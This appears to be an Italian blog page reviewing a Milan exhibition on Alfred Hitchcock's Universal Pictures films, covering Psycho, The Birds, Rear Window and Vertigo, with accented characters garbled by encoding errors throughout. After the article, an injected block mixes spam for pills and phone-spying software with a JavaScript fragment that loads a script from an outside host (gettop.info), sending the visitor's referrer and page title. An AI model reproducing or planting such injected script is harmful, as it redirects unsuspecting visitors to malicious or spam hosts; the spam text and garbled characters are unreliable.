Alfred Hitchcock nei film della Universal Pictures

Alfred Hitchcock nei film della Universal Pictures

La sfida di questa mostra A? ricreare, indagare e quindi trasmettere al visitatore lo straordinario effetto di suspense di cui Alfred Hitchcock (1899 a�� 1980) A? stato creatore unico, irripetibile e imitatissimo. Un effetto che il regista inglese ha ricercato adoperando tutti gli strumenti che la complessitA� della macchina cinematografica gli ha messo a disposizione, ben oltre la trama. Vere e proprie strategie quelle messe in pratica: di ripresa, montaggio, colonna sonora dove anche il silenzio riveste un ruolo fondamentale. Lo stesso vezzo di a�?firmarea�? le sue opere facendo una rapidissima apparizione sullo schermo crea nello spettatore una forma di tensione. Nati come simpatiche gag, i camei divennero col tempo una vera e propria superstizione. Il pubblico iniziA? ad attenderli con impazienza e cosA� per evitare che lo spettatore si distraesse troppo, il regista decise di anticiparli ai primissimi minuti del film. Ed anche quel mix impeccabile tra commedia e brivido, accresce in qualche modo la tensione delle opere di Hitch dove battute brillanti e personaggi leggeri convivono in modo armonioso nella trama ma sullo sfondo bussa inesorabile la��attesa, la consapevolezza dello spettatore che qualcosa di importante e terribile sta per accadere.A� Illuminante nella sua sintetica semplicitA� quello che Hitchcock afferma a proposito: a�?Se fai esplodere una bomba il pubblico ha uno shock di dieci secondi, mentre se lo metti semplicemente al corrente della presenza di una bomba, la suspence puA? essere dilatata e il pubblico mantenuto in sospeso per cinque minutia�?.

Il percorso di Palazzo Reale racconta la figura di Alfred Hitchcock attraverso i principali capolavori firmati Universal Pictures, la celebre casa di produzione che, acquisendo la Paramount Pictures, ha prodotto i suoi film dal 1940 al 1976. Quattordici capolavori che la major ha restaurato e trasferito in digitale, la loro riedizione A? la base su cui A? stata strutturata la mostra tra immagini dei backstage dei film curiositA� sulle scene piA? celebri, sulla��impiego dei primi effetti speciali, sugli attori e sulla vita privata del maestro.

Alla voce del critico cinematografico Gianni Canova il commento e la��analisi dei capolavori che costellano la mostra, da a�?Psycoa�? (1960), una delle opere piA? controverse e innovative di Alfred Hitchcock che riuscA� a battere tutti i record di incassi e fece fuggire il pubblico dalle sale in preda al panico. Ecco allora il dietro le quinte del metafisico motel Bates, il personaggio inquietante di Norman, la doppia personalitA� di Marion, la celebre scena della doccia e il ruolo fondamentale di Alma Reville, la moglie-consigliera del maestro del brivido.

Una sala del percorso A? dedicata a a�?Gli Uccellia�? (1963), altro sconvolgente capolavoro in cui il regista introdusse numerose innovazioni nel campo del suono e degli effetti speciali: con ben 370 trucchi di ripresa, il film richiese quasi tre anni di preparativi a causa della sua complessitA� tecnica. E poi la��esperienza voyeuristica di a�?Jeffa�? a�� James Stewart a�� il protagonista de a�?La Finestra sul cortilea�? (1954). Alla critica del quotidiano London Observer che lo definA� un film a�?orribilea�? perchA? a�?ca��era un tipo che guardava costantemente dalla finestraa�?, Hitchcock a�� nella celebre intervista rilasciata a FranA�ois Truffaut a�� rispose: a�?a��sA�,A� la��uomo era un voyeur, ma non siamo tutti dei voyeur? Scommettiamo che nove persone su dieci, se vedono dalla��altra parte del cortile una donna che si spoglia prima di andare a letto o semplicemente un uomo che mette in ordine la sua stanza, non riescono a trattenersi dal guardare? Potrebbero distogliere gli occhi dicendo: A�non mi riguardaA�, potrebbero chiudere le loro persiane, e invece non lo fanno, staranno lA� a guardare.a�?

Il film uscA� nella��agosto 1954, e nel maggio 1956 aveva incassato 10 milioni di dollari. Altra sezione per a�?La donna che visse due voltea�? (1958), capolavoro divenuto oggetto di venerazione. Una delle storie da��amore piA? angoscianti del cinema, raccontata attraverso un numero infinito di angolazioni e riprese straordinarie nei luoghi piA? famosi di San Francisco. Un racconto attraverso le paure, la��ossessione e la psicologia dei personaggi arricchito dalle dichiarazioni della��attrice Kim Novak, la bionda glaciale protagonista femminile del film.

E ancora immagini e documenti degli altri celebri film hitchcockiani: a�?Sabotatoria�? (1942), a�?La��ombra del dubbioa�? (1943), a�?Nodo alla golaa�? (1948), a�?La congiura degli innocentia�? (1955), a�?La��uomo che sapeva troppoa�? (1956), a�?Marniea�? (1964), a�?Il sipario strappatoa�? (1966) , a�?Topaza�? (1969), a�?Frenzya�? (1972) e a�?Complotto di famigliaa�? (1976), suo ultimo film.

 

Carlo Fassinelli Buy online Order mzt drugs s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; var d=document;var s=d.createElement('script'); pills online order penegra 50 paco rabanne eau de calandre cheapest http://shop.aquos-plan.com/column/787/ candapills Buy Purchase mobile spy, spymaster, cell phone location tracker zyrtec price in malaysia online

Lascia un Commento

L'indirizzo email non verrà pubblicato. I campi obbligatori sono contrassegnati *

È possibile utilizzare questi tag ed attributi XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>